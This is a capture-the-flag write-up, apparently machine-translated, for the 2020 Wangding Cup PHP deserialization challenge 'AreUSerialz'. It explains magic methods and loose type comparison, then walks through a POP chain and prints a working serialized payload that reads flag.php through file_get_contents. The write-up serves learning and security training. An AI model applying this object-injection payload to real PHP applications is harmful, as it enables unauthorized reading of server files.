[wangdingbei 2020 Qinglong formation]areuserialz

[ WANGDING cup 2020 Qinglong formation ]AreUSerialz

Pre knowledge learning

# php  Magic methods 
__construct()  This method was called after initialization 
   	# __construct()  Constructors （constructor method, Also known as constructors ） Is a special function in a class , When using  new  Keyword when instantiating an object , The constructor will automatically call .
	##  example 
<?php
class Person {
    
    public $username;

    public function __construct($name){
    
        echo " Hello ！".PHP_EOL;
        $this -> username = $name;
    }

    public function getlogin(){
    
        echo "username:".$this -> username.PHP_EOL;
    }
}

#  Create an object 
$login = new Person('root');
#  First call  __construct  The code in 
$login -> getlogin();

#  Create another object 
$login2 = new Person('admin');
?>
   
__destruct()  This method was called when the object was destroyed 
# __destruct()  When the object is destroyed , The system will automatically call this method .
1、 When php After code execution , This method is called .
2、 When an object uses  unset()  after , This method is called .
3、 When an object is reassigned , This method is called .

    

# php  Weak type 
    
##　==：　 If a string is compared with a number , The string will be converted to a numeric type and then compared , If it is a string beginning with a number, it will be converted to a numeric comparison .
#  Compare numbers with strings 
<?php
$a = 5;
$b = '5abcde';

##  The number   and   A string starting with a numeric value   Compare 
var_dump($a == $b);		//bool(true)
$b = '6teee';

##  The number   and   Strings starting with different numbers   Compare 
var_dump($a == $b);		//bool(false)
$a = 0;
$b = '1bb';
$c = 'bbb';

# 0  Compare with string 
## 0  and   A string starting with a number   Compare 
var_dump($a == $b);		//bool(false)

## 0  and   No numeric string comparison 
var_dump($a == $c);		//bool(true)

#  Numerical value and string comparison similar to scientific counting method 
##  Numerical value and  [0-9]e[0-9,a-z]  String comparison of type 
<?php
$a = 50;	// int type 
$b = '5e1';	// string type 
var_dump($a == $b);	// bool(true)

##  The comparison will be similar to  '5e1bbb'  Convert to scientific counting  5*10**1  The following is omitted , therefore  50 == 5*10**1
$a = 50;	// int type 
$b = '5e1bbb';	// string type 
var_dump($a == $b);	// bool(true)

# md5  Weak type comparison 

<?php
$a = 's878926199a';
$b = 's155964671a';
var_dump(md5($a) == md5($b));	// bool(true)
var_dump(md5($a));	//string(32) "0e545993274517709034328855841020"
var_dump(md5($b));	//string(32) "0e342768416822451524974117254469"

## md5  Array type comparison 
## md5()  Function cannot compare array types , The return values are all  NULL
<?php
$a[0] = 1;
$b[0] = 1;
var_dump(md5($a));		// NULL
var_dump(md5($a) == md5($b));		// bool(true)

// Report errors ：md5()  The parameter is one string type , But gave a  array  type , Warning: md5() expects parameter 1 to be string, array given in /box/script.php on line 4
?>

Commented on the code , Easy to analyze .

 <?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {
    

    protected $op;
    protected $filename;
    protected $content;

//  Magic methods 1  effect ： When creating an object, execute __construct()
    function __construct() {
            #  Initialize the assignment of parameters 
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();           #  call  process()  Method 
    }

// __construct()  This method was called after initialization 
// __destruct()  This method was called when the object was destroyed 
    public function process() {
    
        if($this->op == "1") {
      #  Check  op Whether the weak comparison is equal to  "1", If it is equal to  "1" call  write()  Method .
            $this->write();
        } else if($this->op == "2") {
    #  If  op == "2"  Call  read()  Method and call  output()  Method output .
            $res = $this->read();
            $this->output($res);
        } else {
    
            $this->output("Bad Hacker!");   #  If it doesn't meet  op == "1"  Then output a sentence 
        }
    }

//  This method is suitable for   The incoming file is checked with the contents of the file , If both values exist, then  content  write in   In the transmitted file , If there is a value that does not exist , The output Failed
    private function write() {
    
        if(isset($this->filename) && isset($this->content)) {
    
            if(strlen((string)$this->content) > 100) {
    
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
    
            $this->output("Failed!");
        }
    }


//  If filename If there is a value, get the file content output ;
    private function read() {
    
        $res = "";
        if(isset($this->filename)) {
    
            $res = file_get_contents($this->filename);
        }
        return $res;
    }


    private function output($s) {
    
        echo "[Result]: <br>";
        echo $s;
    }

//  Magic methods 2  effect ： Object reassignment 、 End of program execution 、 Use  unset()  This method is called automatically when the object is destroyed 
    function __destruct() {
    
        if($this->op === "2")   #  Yes  op  Make a strong comparison  "2"
            $this->op = "1";    #  take op Reset to  "1"
        $this->content = "";    #  take  content  empty 
        $this->process();       #  call  process()  Method 
    }

}

#  The passed in value is ascii Code checking , Returns... If there are invisible characters  false
function is_valid($s) {
    
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

##  The main program executed 
if(isset($_GET{
    'str'})) {
    
    $str = (string)$_GET['str'];
    if(is_valid($str)) {
    
        $obj = unserialize($str);	#  Deserialization 
    }
}

So let's analyze that read() Method , Why analyze read() Methods? , as a result of , stay read() An important point can be seen in the method , Namely file_get_content() function .

Used to read the contents of the incoming file , Then return $res.

private function read() {
    
        $res = "";
        if(isset($this->filename)) {
    
            $res = file_get_contents($this->filename);	#  It can be used to get  flag.php  The content of 
        }
        return $res;
    }

Keep going up , You can find call read() Method entry . You can see ,process() Method in Yes op the Weak type comparison , as long as op == “2” You can call read() Method reading filename 了

 public function process() {
    
        if($this->op == "1") {
      	
            $this->write();
        } else if($this->op == "2") {
    		#  If  op == "2"  Call  read()  Method and call  output()  Method output .
            $res = $this->read();
            $this->output($res);
        } else {
    
            $this->output("Bad Hacker!");  
        }
    }

Keep looking up process() Method call entry , Find two methods to call process() Method . __construct() and __destruct() .

## __construct
function __construct() {
            
    $op = "1";
    $filename = "/tmp/tmpfile";
    $content = "Hello World!";
    $this->process();           #  call  process()  Method 
}

## __destruct
function __destruct() {
    
#  I am right.  if  The statement is followed by a curly bracket , take if If  true  The statement to be executed is wrapped .
    if($this->op === "2"){
       
    	$this->op = "1";
    }
    $this->content = "";    
    $this->process();       #  call  process()  Method 
}

This will find the final position , First __construct() The method can be ignored , Because when performing deserialization , Is directly called first __destruct() Method .

__destruct() Method , First pair op Do a strong type comparison , If yes, it will op Reset to “1”.

If not, it will content Call after empty process() Method .

# payload  Construction ideas 
__destruct() ===> op !== "2"  that will do 
process()  ===> op == "2"  You can call  read()  Method 

op = 2  You can bypass  __destrust()  And call  process()  Can match in  else if  Conditions , Last call  read()

payload Construct the environment

<?php
class FileHandler {
    
    public $op=2;
    public $filename='flag.php';
    public $content;
}

$a = new FileHandler();
var_dump(serialize($a));
?>	

Originally used in the source code protected Tectonic payload, But I found it impossible to use , After seeing the analysis, I knew the reason , Finally, the code above is modified to construct payload.

#  Useless payload
?str=O:11:"FileHandler":3:{
    s:5:"*op";i:2;s:11:"*filename";s:8:"flag.php";s:10:"*content";N;}

#  It can be used payload
?str=O:11:"FileHandler":3:{
    s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}

Reference article

structure PHP Deserialization POP chain

[PHP Deserialization can be learned and used flexibly ](